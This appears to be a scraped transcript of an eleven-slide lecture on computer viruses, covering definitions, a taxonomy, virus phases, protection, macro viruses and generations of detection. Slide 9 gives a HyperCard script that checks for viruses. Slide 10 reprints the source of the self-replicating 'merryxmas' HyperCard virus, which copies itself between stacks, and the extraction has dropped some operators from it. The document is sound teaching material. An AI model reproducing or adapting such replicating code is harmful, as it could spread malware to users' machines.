Computer Viruses - PowerPoint PPT Presentation

About This Presentation
Title:

Computer Viruses

Description:

Perhaps it put a funny message on the screen, or wiped the hard disk clean. ... put line (total-x 1) of stuff & return & host into host ... – PowerPoint PPT presentation

Number of Views:171
Avg rating:3.0/5.0
Slides: 11
Provided by: johnco159
Category:

less

Transcript and Presenter's Notes

Title: Computer Viruses


1
Computer Viruses (and other Malicious Programs)
Computer Viruses and related programs have the
ability to replicate themselves on an ever
increasing number of computers. They originally
spread by people sharing floppy disks. Now they
spread primarily over the Internet (a
Worm). Other Malicious Programs may be
installed by hand on a single machine. They may
also be built into widely distributed commercial
software packages. These are very hard to detect
before the payload activates (Trojan Horses, Trap
Doors, and Logic Bombs).
1
2
Definitions
Virus - code that copies itself into other
programs. A Bacteria replicates until it fills
all disk space, or CPU cycles.
Payload - harmful things the malicious program
does, after it has had time to spread.
Worm - a program that replicates itself across
the network (usually riding on email messages or
attached documents (e.g., macro viruses).
Trojan Horse - instructions in an otherwise good
program that cause bad things to happen (sending
your data or password to an attacker over the
net).
Logic Bomb - malicious code that activates on an
event (e.g., date).
Trap Door (or Back Door) - undocumented entry
point written into code for debugging that can
allow unwanted users.
Easter Egg - extraneous code that does something
cool. A way for programmers to show that they
control the product.
2
3
Taxonomy of Malicious Programs
Independent
Need Host Program
Trapdoors
Logic Bombs
Trojan Horses
Viruses
Bacteria
Worms
3
4
Virus Phases
Dormant - waits for a trigger to start replicating
Propagation - copies itself into other programs
of the same type on a computer. Spreads when the
user shares a file with another computer. Usually
searches a file for its own signature before
infecting. Worms (like Melissa) spread over a
network connection as executable attachments to
email.
Triggering - starts delivering payload.
Sometimes triggered on a certain date, or after a
certain time after infection.
Execution - payload function is done. Perhaps it
put a funny message on the screen, or wiped the
hard disk clean. It may become start the first
phase over again.
4
5
Virus Protection
Have a well-known virus protection program,
configured to
scan disks and downloads automatically for known
viruses.
Do not execute programs (or "macro's") from
unknown
sources (e.g., PS files, Hypercard files, MS
Office documents,
Java, ...), if you can help it. Configure MS
Word and Excel to not automatically execute
macros in documents (reset the defaults).
Avoid the most common operating systems and email
programs, if possible.
5
5
6
Types of Viruses
Parasitic Virus - attaches itself to executable
files as part of their code. Runs whenever the
host program runs. Memory-resident Virus -
Lodges in main memory as part of the residual
operating system. Boot Sector Virus - infects
the boot sector of a disk, and spreads when the
operating system boots up (original DOS
viruses). Stealth Virus - explicitly designed to
hide from Virus Scanning programs. Polymorphic -
Virus - mutates with every new host to prevent
signature detection.
6
7
Macro Viruses
Microsoft Office applications allow macros to
be part of the document. The macro could run
whenever the document is opened, or when a
certain command is selected (Save File). A
macro virus can delete files, generate email,
edit letters, or mail itself to everyone on
internal mail-address lists.
7
8
Virus Detection
1st Generation, Scanners searched files for any
of a library of known virus signatures. Checked
executable files for length changes. 2nd
Generation, Heuristic Scanners looks for more
general signs than specific signatures (code
segments common to many viruses). Checked files
for checksum or hash changes. 3rd Generation,
Activity Traps stay resident in memory and look
for certain patterns of software behavior (e.g.,
scanning files). 4th Generation, Full Featured
combine the best of the techniques above.
8
9
on stackScrLenChk --- JAC generic virus
protection 11-8-95 if the short name of this
stack "Home" then put the script of stack
"Home" into s put (the number of chars in s)
into xChr if (xChr ? card field "StkScrLen")
then answer "Home Stack Script Length Now"
xChr ". It was" (card field
"StkScrLen") ". Could it be a VIRUS ?" with
"Leave" or "Reset" if (It "Reset") then
put xChr into card field "StkScrLen" end if
set the visible of card field "StkScrLen" to
False end if end stackScrLenChk
9
10
on openbackground --merryxmas merryxmas "on
openbackground --merryxmas" end
openbackground on closebackground --merryxmas
merryxmas "on closebackground --merryxmas" end
closebackground on idle --merryxmas put "on
idle --merryxmas" into key if not (the script
of this stack contains key) then
merryxmas key end idle on merryxmas key set
lockscreen to true set lockmessages to true
set lockrecent to true put the userlevel into
oldlevel set the userlevel to 5 put the
script of this stack into stackscript put the
script of stack "Home" into homescript put "on
openbackground --merryxmas" into hostscript if
stackscript contains key then if homescript
contains key then else set cantmodify
of stack "Home" to false if not (cantmodify
of stack "Home") then set the script of
stack "Home" to homescript return
lastlines(hostscipt,stackscript) end if
end if else
if homescript contains key then set
cantmodify of this stack to false if not
(cantmodify of this stack) then set the
script of this stack to stackscript
return lastlines(hostscript,homescript)
end if else -- domenu "Quit Hypercard" end
if set the userlevel to oldlevel set
lockrecent to false set lockmessages to false
set lockscreen to false end merryxmas function
lastlines afterline,stuff put (number of lines
in stuff) into total put line (total-53) to
total of stuff into host repeat with x 55 to
total put line (total-x1) of stuff return
host into host if line 1 of host is
afterline then exit repeat end repeat return
host end lastlines
10
Write a Comment
User Comments (0)
About PowerShow.com